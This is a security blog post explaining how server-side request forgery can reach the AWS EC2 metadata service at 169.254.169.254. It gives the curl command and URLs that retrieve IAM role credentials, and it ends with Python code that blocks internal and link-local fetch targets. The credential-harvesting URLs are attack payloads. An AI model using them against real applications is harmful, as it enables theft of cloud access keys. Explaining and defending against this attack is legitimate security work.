Abusing the AWS Metadata services using SSRF | Cyberops

By Devashish Soni, March 5, 2020

What is AWS

AWS stands for Amazon Web Services. It is a platform that offers reliable, flexible, easy-to-use, cost-effective and scalable cloud computing solutions.

What is SSRF

SSRF stands for Server-Side Request Forgery. It is a vulnerability that lets an attacker send crafted requests from the back-end server of a vulnerable web application. Attackers usually use SSRF to target internal systems that sit behind a firewall and are not reachable from the external network. An attacker who knows about this vulnerability may also use SSRF to access services that are only available through the loopback interface, such as 127.0.0.1. This is also what an attacker can use to get your AWS secret key.

How this vulnerability works

AWS EC2 (Elastic Compute Cloud) has a service called the instance metadata service. It lets any EC2 instance access a REST API running on 169.254.169.254, which returns data about the instance.

You can run this command on an AWS instance to retrieve the credentials for the IAM (Identity and Access Management) role named s3access:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access

Here is an example of the output from the instance:

{
  "Code" : "Success",
  "LastUpdated" : "2020-01-01T01:01:01Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "Your-AWS-Access-Key-Id",
  "SecretAccessKey" : "Your-AWS-Secret-Key",
  "Token" : "token",
  "Expiration" : "2020-01-01T02:02:02Z"
}

How Do We Use It?

Next time you find an SSRF vulnerability in a web application that is using AWS, try hitting these examples:

http://169.254.169.254/latest/meta-data/iam/security-credentials

http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
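
On the defending side, the server-side fetcher can refuse these destinations before it connects. The check below is an added example, not code from the original post; the function names, the SAMPLE_DNS table and its host names are assumptions constructed so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline (not real records).
SAMPLE_DNS = {
    "images.example.com": {"8.8.8.8"},
    "alias.example.net": {"169.254.169.254"},   # public name pointing at the metadata IP
}

def system_resolver(host):
    """Resolve with the OS resolver; use this outside the offline demo."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def sample_resolver(host):
    """Offline stand-in: IP literals resolve to themselves, names via SAMPLE_DNS."""
    try:
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        if host not in SAMPLE_DNS:
            raise OSError("unknown host")
        return SAMPLE_DNS[host]

def blocked_reason(addr):
    """Return why an address must not be fetched, or None if it is public."""
    ip = ipaddress.ip_address(addr.split("%")[0])      # drop any IPv6 zone id
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped       # ::ffff:169.254.169.254 is the same target
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local (metadata service range)"
    if ip.is_private or ip.is_reserved or ip.is_multicast or ip.is_unspecified:
        return "internal or reserved"
    return None

def check_fetch_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied URL the server would fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "scheme or host not allowed"
    try:
        addrs = resolver(parts.hostname)
    except OSError:
        return False, "host does not resolve"
    for addr in sorted(addrs):     # every answer must be acceptable
        reason = blocked_reason(addr)
        if reason:
            return False, reason
    return True, "ok"
```

The fetch itself should connect to the address that passed the check rather than resolving the name a second time, and redirects need the same check on every hop.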
